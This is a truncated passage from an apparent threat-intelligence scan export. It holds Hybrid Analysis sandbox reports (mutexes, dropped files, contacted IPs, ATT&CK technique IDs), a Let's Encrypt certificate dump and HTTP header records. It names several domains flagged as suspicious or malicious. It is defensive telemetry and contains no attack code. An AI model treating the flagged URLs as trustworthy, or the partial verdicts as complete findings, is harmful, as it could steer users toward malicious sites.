[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BBB0B9C986171FE6F65C60CFDD8B124F]- [targetUID: 00000000-00000812]\n "~DF71962694B43492EC.TMP" has type "data"- Location: [%TEMP%\\~DF71962694B43492EC.TMP]- [targetUID: 00000000-00002536]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002536]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002536]\n "BE2B512E0EA306BAD5DC86CC33D62C85" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BE2B512E0EA306BAD5DC86CC33D62C85]- [targetUID: 00000000-00000812]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00000812]\n "93BCFOQ7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\93BCFOQ7.txt]- [targetUID: 00000000-00002536]\n "90MZUOV9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\90MZUOV9.txt]- [targetUID: 00000000-00002536]\n "1B1495DD322A24490E2BF2FAABAE1C61" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\1B1495DD322A24490E2BF2FAABAE1C61]- [targetUID: 00000000-00000812]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002536]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002536]\n "9MS61IBX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9MS61IBX.txt]- [targetUID: 00000000-00002536]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000812]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00000812]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e"- [Source: Input]\n Pattern match: "https://regclickonetwoget.com"- [Source: Input]\n Heuristic match: "e1.o.lencr.org"- [Source: PCAP]\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgQibVTQK8A8W0dT8xq4Fb0ooQ%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: e1.o.lencr.org"- [Source: PCAP]\n Heuristic match: "facesupdates.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /Tracede/animate.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:1 |
| 2023-05-12 02:46:16 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://kutumin.github.io/OSCP-notes/1.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2100:120:WilError_01"\n "Local\\SM0:5488:120:WilError_01"\n "SM0:5488:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:5488:304:WilStaging_02"\n "SM0:5488:120:WilError_01"\n "Local\\SM0:2100:304:WilStaging_02"\n "SM0:2100:120:WilError_01"\n "Local\\SM0:2100:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:2100:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:2100:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:2100:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2100:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.18.11.207:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "142.250.191.74:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "maxcdn.bootstrapcdn.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002100]\n "bcd4e478c907a1db_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\bcd4e478c907a1db_0]- [targetUID: 00000000-00002100]\n "2723a038-a290-4c43-bb8c-08ee81821f60.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "f3b3874d-b7fd-4743-86c6-8a859ff983dd.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\f3b3874d-b7fd-4743-86c6-8a859ff983dd.tmp]- [targetUID: 00000000-00002100]\n "regex_patterns.json" has type "JSON data"- Location: [%TEMP%\\2100_1335449342\\regex_patterns.json]- [targetUID: 00000000-00002100]\n "Session_13324548215740340" has type "data"- [targetUID: N/A]\n "ef0b503b-889d-4eff-b1c3-91558919ec3f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ef0b503b-889d-4eff-b1c3-91558919ec3f.tmp]- [targetUID: 00000000-00002100]\n "b72ee2e9-deac-4a09-bd9f-b4338b5164a2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\b72ee2e9-deac-4a09-bd9f-b4338b5164a2.tmp]- [targetUID: 00000000-00002100]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\2100_586202141\\LICENSE]- [targetUID: 00000000-00002100]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007100]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00002100]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\hyphen-data\\101.0.4906.0\\manifest.json]- [targetUID: 00000000-00002100]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\2100_2088247416\\deny_domains.list]- [targetUID: 00000000-00002100]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00002100]\n "9d9ecc22ec9f384e_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\9d9ecc22ec9f384e_0]- [targetUID: 00000000-00002100]\n "ec01fe90-50b0-43d5-bfc3-bcc31d8c1af8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ec01fe90-50b0-43d5-bfc3-bcc31d8c1af8.tmp]- [targetUID: 00000000-00002100]\n "edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\edge_tracking_page_validator.js]- [targetUID: 00000000-00002100]\n "edge_autofill_global_block_list.json" has type "JSON data"- Location: [%TEMP%\\2100_1335449342\\edge_autofill_global_block_list.json]- [targetUID: 00000000-00002100]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\LOG]- [targetUID: 00000000-00002100]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "3.0.0.8" found in string ""version": "3.0.0.8""\n Potential IP "3.0.0.8" found in string "\xef\xbb\xbf{ "description": "AutofillCore data component", "name": "AutofillCore", "version": "3.0.0.8"}"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n "192.168.241.233"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://kutumin.github.io/OSCP-notes/1.html"\n Pattern match: ".github.io/_:__J__-1ct_;./1"\n Heuristic match: "code.jquery.com"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "https://kutumin.github.io"\n Heuristic match: "ku_umin.gi_hub.io"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "maxcdn.bootstrapcdn.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "kutumin.github.io/OSCP-notes/1.html"\n Heuristic match: "utumin.github.io"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\edge_tracking_page_validator.js]- [targetUID: 00000000-00002100]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\product_page.js]- [targetUID: 00000000-00002100]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\auto_open_controller.js]- [targetUID: 00000000-00002100]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002100]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\2100_586202141\\adblock_snippet.js]- [targetUID: 00000000-00002100]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\2100_1931342577\\shopping_iframe_driver.js]- [targetUID: 00000000-00002100]\n "edge_driver.js" has type | 185.199.111.153 |
| 2023-05-12 03:09:28 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:2b:20:f1:49:ce:17:59:bc:7b:39:e2:e2:fa:42:b1:cb:0c
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 15 16:29:54 2023 GMT
Not After : Jul 14 16:29:53 2023 GMT
Subject: CN=acilacikveteriner.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c7:ba:9d:2f:ad:0e:f2:f8:9e:5c:47:bb:79:38:
f3:7c:d2:03:58:1b:12:06:b4:9c:86:5f:4c:31:08:
97:33:13:16:be:48:6a:55:ee:4e:d6:c5:23:53:75:
a1:48:d1:dc:60:03:c5:b4:9c:18:71:b4:c9:f7:cc:
d7:82:08:84:1d:47:f4:36:9b:65:58:31:ff:ed:94:
b6:e5:56:64:9c:67:0e:0c:de:2b:30:a2:07:ee:75:
47:c5:5f:11:d1:53:0e:8f:da:28:98:3b:38:2e:08:
69:6c:c4:64:ae:8f:c9:f5:19:80:d1:e7:ec:e9:1f:
1b:7f:31:13:13:d9:ca:c5:a0:e4:2d:d1:eb:64:92:
d6:2e:01:58:b8:f4:94:e5:87:37:22:41:1e:89:09:
32:89:e2:e9:ab:65:e1:e9:bd:3a:78:34:71:5a:05:
bd:11:66:12:e7:3d:c0:6e:5c:a0:5b:7c:2f:ea:d3:
59:67:84:e5:94:8d:5d:c2:5d:0b:e9:31:10:a1:3e:
fb:93:69:45:39:5a:bc:0b:ca:b1:2f:22:98:eb:71:
ac:2c:8d:4c:d2:d8:e4:67:1e:91:f0:df:67:09:d3:
65:de:99:92:1f:00:6b:5a:51:7a:ea:61:bf:c6:25:
13:a2:d4:3f:ce:87:f5:99:96:3f:8d:32:cf:33:8d:
7d:cf
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
36:05:AF:4D:AA:A6:E5:D2:C1:C1:21:FE:0A:C4:94:94:AD:20:CD:9B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.acilacikveteriner.com, DNS:acilacikveteriner.com
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 15 17:29:54.589 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:32:B4:07:60:D0:7B:AD:A1:AA:39:A0:33:
2C:4B:E1:77:83:1E:CE:A9:33:24:C8:65:7F:DF:53:65:
4B:41:42:18:02:21:00:FD:74:81:46:18:34:69:3F:14:
99:39:D8:31:BD:1B:5A:70:F3:78:90:AF:AD:75:83:08:
C2:10:05:66:CF:28:68
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Apr 15 17:29:54.608 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:A2:44:92:76:0B:30:A4:08:87:F8:F5:
33:F4:63:45:0C:49:83:2B:1A:52:DE:63:4A:85:9F:D2:
1A:1A:B8:B4:91:02:20:54:D8:11:BC:56:5E:73:20:60:
D4:CE:A7:0A:61:CF:DB:E2:3D:EE:A9:90:BC:A7:2E:FB:
55:B1:EE:11:E5:C7:45
Signature Algorithm: sha256WithRSAEncryption
3e:ae:14:0f:9c:c5:e0:11:98:98:31:9d:f3:e1:b4:c7:8a:a4:
f3:58:c9:e0:a4:05:56:d1:f9:d0:a4:d6:04:9d:0b:f6:b3:35:
fc:d2:7d:b4:11:05:af:75:bb:df:c2:14:e1:5b:2b:67:77:00:
e8:0a:22:8e:f1:5c:6b:dd:54:2d:32:81:db:7d:17:bf:9e:02:
e8:fe:8f:90:d6:80:45:fa:78:c9:ed:6a:db:0e:a3:ea:e8:74:
58:57:12:a1:5d:61:82:32:bc:ce:81:4f:81:b5:41:58:ef:85:
78:cc:7f:6f:ed:5a:0d:b0:9c:73:3f:51:f3:db:b8:4d:40:5f:
df:88:13:b9:16:5d:51:5b:41:71:f3:fe:f9:65:1f:10:70:47:
3b:59:bf:17:0d:cf:cb:71:fc:53:d1:09:8d:77:ea:5e:49:75:
b2:d9:dc:06:49:28:14:58:d2:5f:ea:d1:1b:59:2a:74:e1:24:
4f:0c:e0:62:0a:8a:6b:ea:fb:62:2f:01:c1:76:4f:99:ac:7b:
d1:5a:a4:72:e4:af:bc:0a:c2:6f:91:1c:dc:76:42:49:80:d2:
4b:b7:5c:cd:e2:11:b1:a4:78:34:c3:be:8f:27:49:28:8d:93:
b4:99:37:c8:78:d3:e9:55:fa:eb:2b:67:02:f6:c8:8c:50:e3:
a4:08:c1:b9
| 87.248.157.102 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:53:52 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8003::153:80 | 2606:50c0:8003::153 |
| 2023-05-12 02:54:20 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | funny.battleb0t.xyz |
| 2023-05-12 02:57:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.196.254.27'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://christitus.com/win', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"r3.o.lencr.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_4d4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_4d4_ConnHashTable<1236>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_4d4_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_4d4_IESQMMUTEX_0_303"\n "IsoScope_4d4_IESQMMUTEX_0_331"\n "IsoScope_4d4_IE_EarlyTabStart_0xd68_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1236"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_4d4_ConnHashTable<1236>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.196.254.27:443"\n "23.62.46.138:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3F6F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3F4E.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab3F6E.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "Cab3F4D.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00001236]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002492]\n "GSA12G7R.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GSA12G7R.txt]- [targetUID: 00000000-00001236]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "3E324C193E3E3489256632ECA699B381" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\3E324C193E3E3489256632ECA699B381]- [targetUID: 00000000-00002492]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001236]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00001236]\n "Cab3F6E.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\Cab3F6E.tmp]- [targetUID: 00000000-00002492]\n "_9B5E0C66-351F-11ED-B467-080027B31D69_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00001236]\n "~DFC89EC8CB66FF456D.TMP" has type "data"- Location: [%TEMP%\\~DFC89EC8CB66FF456D.TMP]- [targetUID: 00000000-00001236]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00001236]\n "Tar3F6F.tmp" has type "data"- Location: [%TEMP%\\Tar3F6F.tmp]- [targetUID: 00000000-00002492]\n "~DFB26C3774F79B80EF.TMP" has type "data"- Location: [%TEMP%\\~DFB26C3774F79B80EF.TMP]- 